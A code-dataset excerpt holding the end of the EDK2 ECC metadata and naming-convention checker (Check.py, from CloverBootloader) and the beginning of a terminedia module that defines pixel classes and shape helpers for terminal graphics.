'%s' is defined as a FixPcd but now it is called by c function [%s]\" % (PcdName, FunName), BelongsToTable=TblName, BelongsToItem=Record[1])\r\n if Model in [MODEL_PCD_FEATURE_FLAG] and (not FunName.startswith('FeaturePcdGet') and not FunName.startswith('FeaturePcdSet')):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_PCD_TYPE, OtherMsg=\"The pcd '%s' is defined as a FeaturePcd but now it is called by c function [%s]\" % (PcdName, FunName), BelongsToTable=TblName, BelongsToItem=Record[1])\r\n if Model in [MODEL_PCD_PATCHABLE_IN_MODULE] and (not FunName.startswith('PatchablePcdGet') and not FunName.startswith('PatchablePcdSet')):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_PCD_TYPE, OtherMsg=\"The pcd '%s' is defined as a PatchablePcd but now it is called by c function [%s]\" % (PcdName, FunName), BelongsToTable=TblName, BelongsToItem=Record[1])\r\n\r\n #ERROR_META_DATA_FILE_CHECK_PCD_TYPE\r\n pass\r\n\r\n # Internal worker function to get the INF workspace relative path from FileID\r\n def GetInfFilePathFromID(self, FileID):\r\n Table = EccGlobalData.gDb.TblFile\r\n SqlCommand = \"\"\"select A.FullPath from %s as A where A.ID = %s\"\"\" % (Table.Table, FileID)\r\n RecordSet = Table.Exec(SqlCommand)\r\n Path = \"\"\r\n for Record in RecordSet:\r\n Path = mws.relpath(Record[0], EccGlobalData.gWorkspace)\r\n return Path\r\n\r\n # Check whether two module INFs under one workspace has the same FILE_GUID value\r\n def MetaDataFileCheckModuleFileGuidDuplication(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckModuleFileGuidDuplication == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking for pcd type in c code function usage ...\")\r\n Table = EccGlobalData.gDb.TblInf\r\n SqlCommand = \"\"\"\r\n select A.ID, A.Value3, A.BelongsToFile, B.BelongsToFile from %s as A, %s as B\r\n where A.Value2 = 'FILE_GUID' and B.Value2 = 'FILE_GUID' and\r\n A.Value3 = B.Value3 and A.ID != B.ID group by A.ID\r\n \"\"\" % (Table.Table, Table.Table)\r\n RecordSet = Table.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n InfPath1 = self.GetInfFilePathFromID(Record[2])\r\n InfPath2 = self.GetInfFilePathFromID(Record[3])\r\n if InfPath1 and InfPath2:\r\n if not EccGlobalData.gException.IsException(ERROR_META_DATA_FILE_CHECK_MODULE_FILE_GUID_DUPLICATION, InfPath1):\r\n Msg = \"The FILE_GUID of INF file [%s] is duplicated with that of %s\" % (InfPath1, InfPath2)\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_MODULE_FILE_GUID_DUPLICATION, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n\r\n\r\n # Check Guid Format in module INF\r\n def MetaDataFileCheckModuleFileGuidFormat(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckModuleFileGuidFormat == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Check Guid Format in module INF ...\")\r\n Table = EccGlobalData.gDb.TblInf\r\n SqlCommand = \"\"\"\r\n select ID, Value1, Usage, BelongsToFile from %s where Model = %s group by ID\r\n \"\"\" % (Table.Table, MODEL_EFI_GUID)\r\n RecordSet = Table.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Value1 = Record[1]\r\n Value2 = Record[2]\r\n GuidCommentList = []\r\n InfPath = self.GetInfFilePathFromID(Record[3])\r\n Msg = \"The GUID format of %s in INF file [%s] does not follow rules\" % (Value1, InfPath)\r\n if Value2.startswith(DT.TAB_SPECIAL_COMMENT):\r\n GuidCommentList = Value2[2:].split(DT.TAB_SPECIAL_COMMENT)\r\n if GuidCommentList[0].strip().startswith(DT.TAB_INF_USAGE_UNDEFINED):\r\n continue\r\n elif len(GuidCommentList) > 1:\r\n if not GuidCommentList[0].strip().startswith((DT.TAB_INF_USAGE_PRO,\r\n DT.TAB_INF_USAGE_SOME_PRO,\r\n DT.TAB_INF_USAGE_CON,\r\n DT.TAB_INF_USAGE_SOME_CON)):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_GUID, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n if not (GuidCommentList[1].strip()).startswith(DT.TAB_INF_GUIDTYPE_VAR) and \\\r\n not GuidCommentList[1].strip().startswith((DT.TAB_INF_GUIDTYPE_EVENT,\r\n DT.TAB_INF_GUIDTYPE_HII,\r\n DT.TAB_INF_GUIDTYPE_FILE,\r\n DT.TAB_INF_GUIDTYPE_HOB,\r\n DT.TAB_INF_GUIDTYPE_FV,\r\n DT.TAB_INF_GUIDTYPE_ST,\r\n DT.TAB_INF_GUIDTYPE_TSG,\r\n DT.TAB_INF_GUIDTYPE_GUID,\r\n DT.TAB_INF_GUIDTYPE_PROTOCOL,\r\n DT.TAB_INF_GUIDTYPE_PPI,\r\n DT.TAB_INF_USAGE_UNDEFINED)):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_GUID, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n else:\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_GUID, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n else:\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_GUID, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n\r\n # Check Protocol Format in module INF\r\n def MetaDataFileCheckModuleFileProtocolFormat(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckModuleFileProtocolFormat == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Check Protocol Format in module INF ...\")\r\n Table = EccGlobalData.gDb.TblInf\r\n SqlCommand = \"\"\"\r\n select ID, Value1, Usage, BelongsToFile from %s where Model = %s group by ID\r\n \"\"\" % (Table.Table, MODEL_EFI_PROTOCOL)\r\n RecordSet = Table.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Value1 = Record[1]\r\n Value2 = Record[2]\r\n GuidCommentList = []\r\n InfPath = self.GetInfFilePathFromID(Record[3])\r\n Msg = \"The Protocol format of %s in INF file [%s] does not follow rules\" % (Value1, InfPath)\r\n if Value2.startswith(DT.TAB_SPECIAL_COMMENT):\r\n GuidCommentList = Value2[2:].split(DT.TAB_SPECIAL_COMMENT)\r\n if len(GuidCommentList) >= 1:\r\n if not GuidCommentList[0].strip().startswith((DT.TAB_INF_USAGE_PRO,\r\n DT.TAB_INF_USAGE_SOME_PRO,\r\n DT.TAB_INF_USAGE_CON,\r\n DT.TAB_INF_USAGE_SOME_CON,\r\n DT.TAB_INF_USAGE_NOTIFY,\r\n DT.TAB_INF_USAGE_TO_START,\r\n DT.TAB_INF_USAGE_BY_START,\r\n DT.TAB_INF_USAGE_UNDEFINED)):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_PROTOCOL, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n else:\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_PROTOCOL, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n\r\n\r\n # Check Ppi Format in module INF\r\n def MetaDataFileCheckModuleFilePpiFormat(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckModuleFilePpiFormat == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Check Ppi Format in module INF ...\")\r\n Table = EccGlobalData.gDb.TblInf\r\n SqlCommand = \"\"\"\r\n select ID, Value1, Usage, BelongsToFile from %s where Model = %s group by ID\r\n \"\"\" % (Table.Table, MODEL_EFI_PPI)\r\n RecordSet = Table.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Value1 = Record[1]\r\n Value2 = Record[2]\r\n GuidCommentList = []\r\n InfPath = self.GetInfFilePathFromID(Record[3])\r\n Msg = \"The Ppi format of %s in INF file [%s] does not follow rules\" % (Value1, InfPath)\r\n if Value2.startswith(DT.TAB_SPECIAL_COMMENT):\r\n GuidCommentList = Value2[2:].split(DT.TAB_SPECIAL_COMMENT)\r\n if len(GuidCommentList) >= 1:\r\n if not GuidCommentList[0].strip().startswith((DT.TAB_INF_USAGE_PRO,\r\n DT.TAB_INF_USAGE_SOME_PRO,\r\n DT.TAB_INF_USAGE_CON,\r\n DT.TAB_INF_USAGE_SOME_CON,\r\n DT.TAB_INF_USAGE_NOTIFY,\r\n DT.TAB_INF_USAGE_UNDEFINED)):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_PPI, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n else:\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_PPI, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n\r\n # Check Pcd Format in module INF\r\n def MetaDataFileCheckModuleFilePcdFormat(self):\r\n if EccGlobalData.gConfig.MetaDataFileCheckModuleFilePcdFormat == '1' or EccGlobalData.gConfig.MetaDataFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Check Pcd Format in module INF ...\")\r\n Table = EccGlobalData.gDb.TblInf\r\n SqlCommand = \"\"\"\r\n select ID, Model, Value1, Value2, Usage, BelongsToFile from %s where Model >= %s and Model < %s group by ID\r\n \"\"\" % (Table.Table, MODEL_PCD, MODEL_META_DATA_HEADER)\r\n RecordSet = Table.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Model = Record[1]\r\n PcdName = Record[2] + '.' + Record[3]\r\n Usage = Record[4]\r\n PcdCommentList = []\r\n InfPath = self.GetInfFilePathFromID(Record[5])\r\n Msg = \"The Pcd format of %s in INF file [%s] does not follow rules\" % (PcdName, InfPath)\r\n if Usage.startswith(DT.TAB_SPECIAL_COMMENT):\r\n PcdCommentList = Usage[2:].split(DT.TAB_SPECIAL_COMMENT)\r\n if len(PcdCommentList) >= 1:\r\n if Model in [MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_FEATURE_FLAG] \\\r\n and not PcdCommentList[0].strip().startswith((DT.TAB_INF_USAGE_SOME_PRO,\r\n DT.TAB_INF_USAGE_CON,\r\n DT.TAB_INF_USAGE_UNDEFINED)):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_PCD, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n if Model in [MODEL_PCD_PATCHABLE_IN_MODULE, MODEL_PCD_DYNAMIC, MODEL_PCD_DYNAMIC_EX] \\\r\n and not PcdCommentList[0].strip().startswith((DT.TAB_INF_USAGE_PRO,\r\n DT.TAB_INF_USAGE_SOME_PRO,\r\n DT.TAB_INF_USAGE_CON,\r\n DT.TAB_INF_USAGE_SOME_CON,\r\n DT.TAB_INF_USAGE_UNDEFINED)):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_PCD, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n else:\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_META_DATA_FILE_CHECK_FORMAT_PCD, OtherMsg=Msg, BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n\r\n # Check whether these is duplicate Guid/Ppi/Protocol name\r\n def CheckGuidProtocolPpi(self, ErrorID, Model, Table):\r\n Name = ''\r\n if Model == MODEL_EFI_GUID:\r\n Name = 'guid'\r\n if Model == MODEL_EFI_PROTOCOL:\r\n Name = 'protocol'\r\n if Model == MODEL_EFI_PPI:\r\n Name = 'ppi'\r\n SqlCommand = \"\"\"\r\n select A.ID, A.Value1 from %s as A, %s as B\r\n where A.Model = %s and B.Model = %s\r\n and A.Value1 like B.Value1 and A.ID != B.ID\r\n and A.Scope1 = B.Scope1\r\n and A.Enabled > -1\r\n and B.Enabled > -1\r\n group by A.ID\r\n \"\"\" % (Table.Table, Table.Table, Model, Model)\r\n RecordSet = Table.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if not EccGlobalData.gException.IsException(ErrorID, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ErrorID, OtherMsg=\"The %s name [%s] is defined more than one time\" % (Name.upper(), Record[1]), BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n\r\n # Check whether these is duplicate Guid/Ppi/Protocol value\r\n def CheckGuidProtocolPpiValue(self, ErrorID, Model):\r\n Name = ''\r\n Table = EccGlobalData.gDb.TblDec\r\n if Model == MODEL_EFI_GUID:\r\n Name = 'guid'\r\n if Model == MODEL_EFI_PROTOCOL:\r\n Name = 'protocol'\r\n if Model == MODEL_EFI_PPI:\r\n Name = 'ppi'\r\n SqlCommand = \"\"\"\r\n select A.ID, A.Value1, A.Value2 from %s as A, %s as B\r\n where A.Model = %s and B.Model = %s\r\n and A.Value2 like B.Value2 and A.ID != B.ID\r\n and A.Scope1 = B.Scope1 and A.Value1 != B.Value1\r\n group by A.ID\r\n \"\"\" % (Table.Table, Table.Table, Model, Model)\r\n RecordSet = Table.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if not EccGlobalData.gException.IsException(ErrorID, Record[2]):\r\n EccGlobalData.gDb.TblReport.Insert(ErrorID, OtherMsg=\"The %s value [%s] is used more than one time\" % (Name.upper(), Record[2]), BelongsToTable=Table.Table, BelongsToItem=Record[0])\r\n\r\n # Naming Convention Check\r\n def NamingConventionCheck(self):\r\n if EccGlobalData.gConfig.NamingConventionCheckDefineStatement == '1' \\\r\n or EccGlobalData.gConfig.NamingConventionCheckTypedefStatement == '1' \\\r\n or EccGlobalData.gConfig.NamingConventionCheckIfndefStatement == '1' \\\r\n or EccGlobalData.gConfig.NamingConventionCheckVariableName == '1' \\\r\n or EccGlobalData.gConfig.NamingConventionCheckSingleCharacterVariable == '1' \\\r\n or EccGlobalData.gConfig.NamingConventionCheckAll == '1'\\\r\n or EccGlobalData.gConfig.CheckAll == '1':\r\n for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n for F in Filenames:\r\n if os.path.splitext(F)[1] in ('.h', '.c'):\r\n FullName = os.path.join(Dirpath, F)\r\n Id = c.GetTableID(FullName)\r\n if Id < 0:\r\n continue\r\n FileTable = 'Identifier' + str(Id)\r\n self.NamingConventionCheckDefineStatement(FileTable)\r\n self.NamingConventionCheckTypedefStatement(FileTable)\r\n self.NamingConventionCheckVariableName(FileTable)\r\n self.NamingConventionCheckSingleCharacterVariable(FileTable)\r\n if os.path.splitext(F)[1] in ('.h'):\r\n self.NamingConventionCheckIfndefStatement(FileTable)\r\n\r\n self.NamingConventionCheckPathName()\r\n self.NamingConventionCheckFunctionName()\r\n\r\n # Check whether only capital letters are used for #define declarations\r\n def NamingConventionCheckDefineStatement(self, FileTable):\r\n if EccGlobalData.gConfig.NamingConventionCheckDefineStatement == '1' or EccGlobalData.gConfig.NamingConventionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking naming convention of #define statement ...\")\r\n\r\n SqlCommand = \"\"\"select ID, Value from %s where Model = %s\"\"\" % (FileTable, MODEL_IDENTIFIER_MACRO_DEFINE)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Name = Record[1].strip().split()[1]\r\n if Name.find('(') != -1:\r\n Name = Name[0:Name.find('(')]\r\n if Name.upper() != Name:\r\n if not EccGlobalData.gException.IsException(ERROR_NAMING_CONVENTION_CHECK_DEFINE_STATEMENT, Name):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_NAMING_CONVENTION_CHECK_DEFINE_STATEMENT, OtherMsg=\"The #define name [%s] does not follow the rules\" % (Name), BelongsToTable=FileTable, BelongsToItem=Record[0])\r\n\r\n # Check whether only capital letters are used for typedef declarations\r\n def NamingConventionCheckTypedefStatement(self, FileTable):\r\n if EccGlobalData.gConfig.NamingConventionCheckTypedefStatement == '1' or EccGlobalData.gConfig.NamingConventionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking naming convention of #typedef statement ...\")\r\n\r\n SqlCommand = \"\"\"select ID, Name from %s where Model = %s\"\"\" % (FileTable, MODEL_IDENTIFIER_TYPEDEF)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Name = Record[1].strip()\r\n if Name != '' and Name is not None:\r\n if Name[0] == '(':\r\n Name = Name[1:Name.find(')')]\r\n if Name.find('(') > -1:\r\n Name = Name[Name.find('(') + 1 : Name.find(')')]\r\n Name = Name.replace('WINAPI', '')\r\n Name = Name.replace('*', '').strip()\r\n if Name.upper() != Name:\r\n if not EccGlobalData.gException.IsException(ERROR_NAMING_CONVENTION_CHECK_TYPEDEF_STATEMENT, Name):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_NAMING_CONVENTION_CHECK_TYPEDEF_STATEMENT, OtherMsg=\"The #typedef name [%s] does not follow the rules\" % (Name), BelongsToTable=FileTable, BelongsToItem=Record[0])\r\n\r\n # Check whether the #ifndef at the start of an include file uses both prefix and postfix underscore characters, '_'.\r\n def NamingConventionCheckIfndefStatement(self, FileTable):\r\n if EccGlobalData.gConfig.NamingConventionCheckIfndefStatement == '1' or EccGlobalData.gConfig.NamingConventionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking naming convention of #ifndef statement ...\")\r\n\r\n SqlCommand = \"\"\"select ID, Value from %s where Model = %s\"\"\" % (FileTable, MODEL_IDENTIFIER_MACRO_IFNDEF)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n if RecordSet:\r\n # Only check the first ifndef statement of the file\r\n FirstDefine = sorted(RecordSet, key=lambda Record: Record[0])[0]\r\n Name = FirstDefine[1].replace('#ifndef', '').strip()\r\n if Name[0] == '_' or Name[-1] != '_' or Name[-2] == '_':\r\n if not EccGlobalData.gException.IsException(ERROR_NAMING_CONVENTION_CHECK_IFNDEF_STATEMENT, Name):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_NAMING_CONVENTION_CHECK_IFNDEF_STATEMENT, OtherMsg=\"The #ifndef name [%s] does not follow the rules\" % (Name), BelongsToTable=FileTable, BelongsToItem=FirstDefine[0])\r\n\r\n # Rule for path name, variable name and function name\r\n # 1. First character should be upper case\r\n # 2. Existing lower case in a word\r\n # 3. No space existence\r\n # Check whether the path name followed the rule\r\n def NamingConventionCheckPathName(self):\r\n if EccGlobalData.gConfig.NamingConventionCheckPathName == '1' or EccGlobalData.gConfig.NamingConventionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking naming convention of file path name ...\")\r\n Pattern = re.compile(r'^[A-Z]+\\S*[a-z]\\S*$')\r\n SqlCommand = \"\"\"select ID, Name from File\"\"\"\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if not Pattern.match(Record[1]):\r\n if not EccGlobalData.gException.IsException(ERROR_NAMING_CONVENTION_CHECK_PATH_NAME, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_NAMING_CONVENTION_CHECK_PATH_NAME, OtherMsg=\"The file path [%s] does not follow the rules\" % (Record[1]), BelongsToTable='File', BelongsToItem=Record[0])\r\n\r\n # Rule for path name, variable name and function name\r\n # 1. First character should be upper case\r\n # 2. Existing lower case in a word\r\n # 3. No space existence\r\n # 4. Global variable name must start with a 'g'\r\n # Check whether the variable name followed the rule\r\n def NamingConventionCheckVariableName(self, FileTable):\r\n if EccGlobalData.gConfig.NamingConventionCheckVariableName == '1' or EccGlobalData.gConfig.NamingConventionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking naming convention of variable name ...\")\r\n Pattern = re.compile(r'^[A-Zgm]+\\S*[a-z]\\S*$')\r\n\r\n SqlCommand = \"\"\"select ID, Name, Modifier from %s where Model = %s\"\"\" % (FileTable, MODEL_IDENTIFIER_VARIABLE)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Var = Record[1]\r\n Modifier = Record[2]\r\n if Var.startswith('CONST'):\r\n Var = Var[5:].lstrip()\r\n if not Pattern.match(Var) and not (Modifier.endswith('*') and Var.startswith('p')):\r\n if not EccGlobalData.gException.IsException(ERROR_NAMING_CONVENTION_CHECK_VARIABLE_NAME, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_NAMING_CONVENTION_CHECK_VARIABLE_NAME, OtherMsg=\"The variable name [%s] does not follow the rules\" % (Record[1]), BelongsToTable=FileTable, BelongsToItem=Record[0])\r\n\r\n # Rule for path name, variable name and function name\r\n # 1. First character should be upper case\r\n # 2. Existing lower case in a word\r\n # 3. No space existence\r\n # Check whether the function name followed the rule\r\n def NamingConventionCheckFunctionName(self):\r\n if EccGlobalData.gConfig.NamingConventionCheckFunctionName == '1' or EccGlobalData.gConfig.NamingConventionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking naming convention of function name ...\")\r\n Pattern = re.compile(r'^[A-Z]+\\S*[a-z]\\S*$')\r\n SqlCommand = \"\"\"select ID, Name from Function\"\"\"\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if not Pattern.match(Record[1]):\r\n if not EccGlobalData.gException.IsException(ERROR_NAMING_CONVENTION_CHECK_FUNCTION_NAME, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_NAMING_CONVENTION_CHECK_FUNCTION_NAME, OtherMsg=\"The function name [%s] does not follow the rules\" % (Record[1]), BelongsToTable='Function', BelongsToItem=Record[0])\r\n\r\n # Check whether NO use short variable name with single character\r\n def NamingConventionCheckSingleCharacterVariable(self, FileTable):\r\n if EccGlobalData.gConfig.NamingConventionCheckSingleCharacterVariable == '1' or EccGlobalData.gConfig.NamingConventionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking naming convention of single character variable name ...\")\r\n\r\n SqlCommand = \"\"\"select ID, Name from %s where Model = %s\"\"\" % (FileTable, MODEL_IDENTIFIER_VARIABLE)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n Variable = Record[1].replace('*', '')\r\n if len(Variable) == 1:\r\n if not EccGlobalData.gException.IsException(ERROR_NAMING_CONVENTION_CHECK_SINGLE_CHARACTER_VARIABLE, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_NAMING_CONVENTION_CHECK_SINGLE_CHARACTER_VARIABLE, OtherMsg=\"The variable name [%s] does not follow the rules\" % (Record[1]), BelongsToTable=FileTable, BelongsToItem=Record[0])\r\n\r\ndef FindPara(FilePath, Para, CallingLine):\r\n Lines = open(FilePath).readlines()\r\n Line = ''\r\n for Index in range(CallingLine - 1, 0, -1):\r\n # Find the nearest statement for Para\r\n Line = Lines[Index].strip()\r\n if Line.startswith('%s = ' % Para):\r\n Line = Line.strip()\r\n return Line\r\n break\r\n\r\n return ''\r\n\r\n##\r\n#\r\n# This acts like the main() function for the script, unless it is 'import'ed into another\r\n# script.\r\n#\r\nif __name__ == '__main__':\r\n Check = Check()\r\n Check.Check()\r\n","repo_name":"CloverHackyColor/CloverBootloader","sub_path":"BaseTools/Source/Python/Ecc/Check.py","file_name":"Check.py","file_ext":"py","file_size_in_byte":102607,"program_lang":"python","lang":"en","doc_type":"code","stars":4186,"dataset":"github-code","pt":"53"} +{"seq_id":"13409686249","text":"import heapq\nimport logging\nimport math\nimport sys\nimport threading\nfrom abc import ABC, abstractmethod\nfrom collections import namedtuple, ChainMap, deque\nfrom collections.abc import Sequence\nfrom functools import wraps\nfrom inspect import signature\nfrom itertools import chain\nfrom io import StringIO\nfrom pathlib import Path\nfrom weakref import ref, ReferenceType\n\nfrom terminedia.contexts import Context\nfrom terminedia.sprites import SpriteContainer\nfrom terminedia.subpixels import BrailleChars, HalfChars, SextantChars\nfrom terminedia.unicode import char_width\nfrom terminedia.utils import Color, Rect, V2, LazyBindProperty, get_current_tick, size_in_blocks\nfrom terminedia.unicode_transforms import translate_chars\nfrom terminedia.values import (\n DEFAULT_FG,\n DEFAULT_BG,\n TRANSPARENT,\n CONTEXT_COLORS,\n Directions,\n Effects,\n CONTINUATION,\n EMPTY,\n UNICODE_EFFECTS,\n)\n\nlogger = logging.getLogger(__name__)\n\ntry:\n from PIL import Image as PILImage\nexcept ImportError:\n PILImage = None\n\n\n#: Special value that can be sent (.send()) during interaction\n#: on Shape areas, so that the inner iterator does not go up to\n#: the end of a line in the internal buffer is those values\n#: will no longer be used. The `drawing.Drawing.blit` method\n#: has the code that sends this.\nSKIP_LINE = object()\n\nPixelClasses = {}\npixel_capabilities = namedtuple(\n \"pixel_capabilities\", \"value_type has_foreground has_background has_effects\"\n)\n\n\nclass Pixel(tuple):\n __slots__ = ()\n\n def __new__(cls, *args, context=None):\n if args and isinstance(args[0], Pixel):\n args = args[0].get_values(context, cls.capabilities)\n return super().__new__(cls, *args)\n\n def get_values(self, context=None, capabilities=None):\n \"\"\"Retrieve pixel or context values, according to caller's context and capabilities\n\n That is, if this pixel provides value as str, fg and bg but no effects,\n and the target accepts value as boolean, fg, and text effects,\n a list with those properties set is generated.\n\n List is choosen in order to allow further processing of values\n without recreating the container (for example, to replace\n 'CONTEXT_COLORS' for the actual colors.\n\n Although passing a context is optional, if, for generating the target\n values any context values are needed, no further tests are done:\n an AttributeError on the 'None' default context will take place.\n \"\"\"\n other_capabilities = capabilities or pixel_capabilities(str, True, True, True)\n cap = self.capabilities\n values = []\n if other_capabilities.value_type == cap.value_type:\n values.append(self.value)\n elif other_capabilities.value_type == bool:\n if cap.value_type == str:\n values.append(self.value != EMPTY)\n else:\n # TODO: When implementing alpha colors,\n # a full transparent color should evaluate to 'False'\n values.append(bool(self.value))\n else:\n values.append(context.char if self.value else EMPTY)\n\n if other_capabilities.has_foreground:\n values.append(self.foreground if cap.has_foreground else context.color)\n if other_capabilities.has_background:\n values.append(self.background if cap.has_background else context.background)\n if other_capabilities.has_effects:\n values.append(self.effects if cap.has_effects else context.effects)\n\n return values\n\n\nfull_pixel = namedtuple(\"Pixel\", \"char fg bg effects\")\n\n\ndef pixel_factory(\n value_type=str,\n has_foreground=True,\n has_background=False,\n has_effects=False,\n translate_dots=True,\n):\n \"\"\"Returns a custom pixel class with specified capabilities\n\n Args:\n value_type(str or bool): Data type returned by the pixel\n has_foreground (bool): Whether pixel has a foreground color\n has_background (bool): Whether pixel has a background color\n has_effects (bool): Whether pixel has text-attribute flags\n\n Created pixel classes or instances are not intended to be directly manipulated -\n instead, they are just a way to convey information from internal images/shapes\n to methods that will draw then.\n \"\"\"\n PixelBase = globals()[\"Pixel\"]\n\n capabilities = pixel_capabilities(\n value_type, has_foreground, has_background, has_effects\n )\n if capabilities in PixelClasses:\n Pixel = PixelClasses[capabilities]\n else:\n pixel_tuple = namedtuple(\n \"PixelBase\",\n (\n (\"value\",)\n + ((\"foreground\",) if has_foreground else ())\n + ((\"background\",) if has_background else ())\n + ((\"effects\",) if has_effects else ())\n ),\n )\n\n def __repr__(self):\n return \"Pixel({})\".format(\n \", \".join(\n f\"{field}={getattr(self, field)!r}\" for field in pixel_tuple._fields\n )\n )\n\n Pixel = type(\n \"Pixel\",\n (PixelBase, pixel_tuple),\n {\"capabilities\": capabilities, \"__repr__\": __repr__, \"__slots__\": ()},\n )\n\n if translate_dots or value_type != str:\n\n @property\n def value(self):\n value = super(Pixel, self).value\n return (\n (value not in (\" .\"))\n if value_type is bool and isinstance(value, str)\n else value_type(value)\n )\n\n Pixel.value = value\n\n PixelClasses[capabilities] = Pixel\n\n return Pixel\n\n\nclass ShapeApiMixin:\n __slots__ = ()\n\n @LazyBindProperty(type=Context)\n def context(self):\n return Context()\n\n @LazyBindProperty\n def draw(self):\n return self._get_drawing()\n\n @LazyBindProperty\n def text(self):\n return self._get_text()\n\n @LazyBindProperty\n def high(self):\n return self._get_highres()\n\n @LazyBindProperty\n def square(self):\n return self._get_highres(block_class=HalfChars, block_width=1, block_height=2)\n\n @LazyBindProperty\n def braille(self):\n return self._get_highres(block_class=BrailleChars, block_height=4)\n\n @LazyBindProperty\n def sextant(self):\n return self._get_highres(block_class=SextantChars, block_height=3)\n\n @LazyBindProperty\n def sprites(self):\n self.has_sprites = True\n return SpriteContainer(self)\n\n @property\n def full(self):\n return self\n\n def at_parent(self, pos):\n \"\"\"emulate high-resolution `at_parent` coordinate transform method: a NOP at full resolution\"\"\"\n return V2(pos)\n\n has_sprites = False\n\n def get_size(self):\n return V2(self.width, self.height)\n\n @property\n def size(self):\n return self.get_size()\n\n _data_func = staticmethod(lambda size: [EMPTY * size.x] * size.y)\n\n def _get_drawing(self):\n from terminedia.drawing import Drawing\n\n # The 'type(self).__setitem__` pattern ensures __setitem__ is called on the proxy,\n # not on the proxied 